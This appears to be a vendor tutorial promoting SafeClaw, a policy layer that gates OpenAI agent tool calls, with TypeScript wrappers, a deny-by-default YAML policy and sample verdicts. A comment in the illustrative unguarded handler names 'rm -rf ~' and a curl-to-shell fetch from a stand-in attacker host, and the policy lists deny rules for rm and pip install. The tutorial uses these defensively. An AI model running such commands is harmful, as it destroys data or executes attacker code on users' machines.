2026-02-05 · Authensor

How to Safely Use OpenAI Agents

To safely use OpenAI Agents, add SafeClaw action-level gating. Install with npx @authensor/safeclaw and define a deny-by-default policy that controls which tools the agent can invoke, which files it can access through Code Interpreter, and which function calls it can make through the Assistants API or Agents SDK. OpenAI's agent ecosystem — spanning the Assistants API, the Agents SDK, and Code Interpreter — can execute arbitrary Python code, read uploaded files, call external functions you define, and chain these operations across conversation turns.

What OpenAI Agents Can Do (And Why That's Risky)

OpenAI provides multiple agent surfaces, each with distinct capabilities:

- Assistants API: function calling against handlers you implement, plus file access and operations chained across conversation turns
- Agents SDK: tools you define and execute in your own runtime
- Code Interpreter: arbitrary Python execution over uploaded files, sandboxed on OpenAI's infrastructure

The risk is in the function handlers and tool definitions you provide. OpenAI's infrastructure sandboxes Code Interpreter, but everything in Function Calling and the Agents SDK runs in YOUR environment with YOUR permissions.
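
For illustration, here is the kind of unguarded handler this is talking about (the handler and tool names are hypothetical): whatever the model places in the function arguments runs with your process's permissions.

// Illustrative only: a hypothetical unguarded function-call handler.
// Whatever the model puts in `arguments` executes with this process's permissions.
import { exec } from "node:child_process";
import { promisify } from "node:util";

const execAsync = promisify(exec);

async function handleToolCallUnguarded(call: { name: string; arguments: string }) {
  const args = JSON.parse(call.arguments);
  if (call.name === "run_command") {
    // No policy check: "rm -rf ~", "curl attacker.example | sh" -- anything the model emits runs.
    return await execAsync(args.command);
  }
  return { error: `Unknown tool: ${call.name}` };
}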

Step-by-Step Setup

Step 1: Install SafeClaw

npx @authensor/safeclaw

Select SDK Wrapper as the integration type. For OpenAI agents, SafeClaw wraps your tool/function handlers with policy evaluation.
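
Conceptually, guard(action, handler) returns a new handler that asks the policy engine for a verdict before your code runs and short-circuits on deny. A simplified sketch of that wrapper pattern (not SafeClaw's actual implementation; the verdict shape mirrors the evaluate() call shown in Step 4):

// Simplified sketch of the wrapper pattern that guard() applies.
// Illustrative only, not SafeClaw's source.
type Handler<P, R> = (params: P) => Promise<R>;

function guardSketch<P, R>(
  evaluate: (action: string, params: P) => Promise<{ effect: "allow" | "deny"; reason?: string }>,
  action: string,
  handler: Handler<P, R>
): Handler<P, R | { error: string }> {
  return async (params: P) => {
    const verdict = await evaluate(action, params); // policy check happens first
    if (verdict.effect === "deny") {
      return { error: `Action denied: ${verdict.reason}` }; // handler never runs
    }
    return handler(params); // only runs on allow
  };
}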

Step 2: Get Your API Key

Visit safeclaw.onrender.com to create a free-tier key. Free keys renew every 7 days with no credit card. The dashboard wizard helps generate your initial policy.

Step 3: Wrap Your Tool Handlers (Agents SDK)

import fs from "node:fs/promises";
import { exec } from "node:child_process";
import { promisify } from "node:util";
import { z } from "zod";
import { SafeClaw } from "@authensor/safeclaw";
import { Agent, tool } from "@openai/agents";

const execAsync = promisify(exec);

const safeclaw = new SafeClaw({
  apiKey: process.env.SAFECLAW_API_KEY,
  policy: "./safeclaw.policy.yaml",
});

const writeFile = tool({
  name: "write_file",
  description: "Write content to a file",
  parameters: z.object({ path: z.string(), content: z.string() }),
  execute: safeclaw.guard("file_write", async (params) => {
    // Only runs if the policy allows this specific path
    await fs.writeFile(params.path, params.content);
    return { success: true };
  }),
});

const runCommand = tool({
  name: "run_command",
  description: "Execute a shell command",
  parameters: z.object({ command: z.string() }),
  execute: safeclaw.guard("shell_exec", async (params) => {
    // Only runs if the policy allows this command pattern
    return await execAsync(params.command);
  }),
});

const agent = new Agent({
  name: "coding-assistant",
  tools: [writeFile, runCommand],
});
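
Run the agent as usual; a denied tool call surfaces to the model as the guard's error return instead of an executed action. A minimal sketch, assuming the Agents SDK's run() helper:

import { run } from "@openai/agents";

// The guarded tools decide per call: allowed actions execute, denied ones return an error object.
const result = await run(agent, "Analyze data/input.csv and write a summary to output/report.csv");
console.log(result.finalOutput);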

Step 4: Wrap Function Handlers (Assistants API)

const safeclaw = new SafeClaw({
  apiKey: process.env.SAFECLAW_API_KEY,
  policy: "./safeclaw.policy.yaml",
});

// Before executing any function call from the Assistants API:
async function handleFunctionCall(call) {
  const verdict = await safeclaw.evaluate({
    action: mapFunctionToAction(call.function.name),
    params: JSON.parse(call.function.arguments),
  });

  if (verdict.effect === "deny") {
    return { error: `Action denied: ${verdict.reason}` };
  }

  return await executeFunctionCall(call);
}
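
mapFunctionToAction and executeFunctionCall above are your own code: the first maps assistant function names to SafeClaw action types, the second runs the function once it is allowed. One possible shape for the mapping (the function names here are hypothetical; use the ones your assistant actually exposes):

// Hypothetical mapping from assistant function names to SafeClaw action types.
// Replace the keys with the functions your assistant actually defines.
function mapFunctionToAction(functionName: string): string {
  const map: Record<string, string> = {
    write_file: "file_write",
    read_file: "file_read",
    run_command: "shell_exec",
    fetch_url: "network",
  };
  // Unmapped functions fall through to an action name the deny-by-default policy will reject.
  return map[functionName] ?? "unknown";
}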

Step 5: Define Your Policy

version: 1
default: deny

rules:
  - action: file_read
    path: "${PROJECT_DIR}/data/**"
    effect: allow

  - action: file_read
    path: "*/.env"
    effect: deny

  - action: file_write
    path: "${PROJECT_DIR}/output/**"
    effect: allow

  - action: file_write
    path: "${PROJECT_DIR}/src/**"
    effect: deny

  - action: shell_exec
    command: "python*"
    effect: allow

  - action: shell_exec
    command: "pip install*"
    effect: deny

  - action: shell_exec
    command: "rm*"
    effect: deny

  - action: network
    host: "api.openai.com"
    effect: allow

  - action: network
    host: "*.internal.company.com"
    effect: deny

  - action: network
    host: "*"
    effect: deny

Step 6: Simulate Before Enforcing

npx @authensor/safeclaw simulate --policy safeclaw.policy.yaml

Review logged verdicts, refine rules, then enforce.

What Gets Blocked, What Gets Through

ALLOWED — Agent writes analysis output:

{ "action": "file_write", "path": "/project/output/report.csv", "verdict": "ALLOW" }

DENIED — Agent tries to modify source code:

{ "action": "file_write", "path": "/project/src/auth/login.ts", "verdict": "DENY", "reason": "path matches src/** deny rule" }

ALLOWED — Agent runs a Python script:

{ "action": "shell_exec", "command": "python analyze.py --input data.csv", "verdict": "ALLOW" }

DENIED — Agent installs an unknown package:

{ "action": "shell_exec", "command": "pip install obscure-package", "verdict": "DENY", "reason": "pip install* matches deny rule" }

DENIED — Agent calls internal API:

{ "action": "network", "host": "db.internal.company.com", "verdict": "DENY", "reason": "host matches *.internal.company.com deny rule" }

Without SafeClaw vs With SafeClaw

| Scenario | Without SafeClaw | With SafeClaw |
|---|---|---|
| Function call writes to /etc/ via misinterpreted path | File written to system directory | Blocked — path outside allowed output/** |
| Agent's tool handler calls internal microservice | Request sent with ambient credentials | Blocked — internal hosts denied by network rule |
| Agent generates report to output/ directory | Report written normally | Allowed — output/** is in write allowlist |
| Agent tries pip install in tool handler | Package installed, install scripts execute | Blocked — pip install* matches deny rule |
| Agent reads uploaded data file | Data read for analysis | Allowed — data/** is in read allowlist |

Every action evaluation is recorded in SafeClaw's tamper-evident audit trail (a SHA-256 hash chain). The control plane receives only action metadata — never your OpenAI API key, function arguments, or file contents. SafeClaw runs with zero third-party dependencies, evaluates in sub-millisecond time, and is backed by 446 tests under TypeScript strict mode. The client is 100% open source, MIT licensed.
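
For intuition on why a hash chain makes the trail tamper-evident: each entry's hash covers the previous entry's hash, so editing any earlier record invalidates every hash after it. An illustrative sketch of the general technique (not SafeClaw's internal format):

import { createHash } from "node:crypto";

// Each audit entry commits to the previous entry's hash. Altering any earlier
// record changes every subsequent hash, so tampering is detectable on replay.
function appendEntry(prevHash: string, entry: Record<string, unknown>) {
  const hash = createHash("sha256")
    .update(prevHash)
    .update(JSON.stringify(entry))
    .digest("hex");
  return { hash, entry };
}

const genesis = "0".repeat(64);
const first = appendEntry(genesis, { action: "file_write", verdict: "ALLOW" });
const second = appendEntry(first.hash, { action: "shell_exec", verdict: "DENY" });
console.log(second.hash); // changes if either entry is modified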

Try SafeClaw

Action-level gating for AI agents. Set it up in your browser in 60 seconds.

$ npx @authensor/safeclaw